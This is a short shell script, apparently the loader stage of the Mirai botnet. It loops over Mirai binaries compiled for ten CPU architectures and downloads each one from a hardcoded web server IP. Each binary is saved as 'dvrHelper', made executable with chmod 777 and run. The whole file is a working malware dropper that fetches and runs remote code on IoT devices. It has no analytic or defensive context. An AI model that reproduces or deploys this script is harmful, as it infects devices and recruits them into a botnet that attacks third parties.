#!/bin/sh

# Edit
WEBSERVER="89.34.26.34:80"
# Stop editing now


BINARIES="mirai.arm mirai.arm7 mirai.mips mirai.ppc mirai.spc mirai.arm5n mirai.m68k mirai.mpsl mirai.sh4 mirai.x86"

for Binary in $BINARIES; do
    wget http://$WEBSERVER/bins/$Binary -O dvrHelper
    chmod 777 dvrHelper
    ./dvrHelper
done
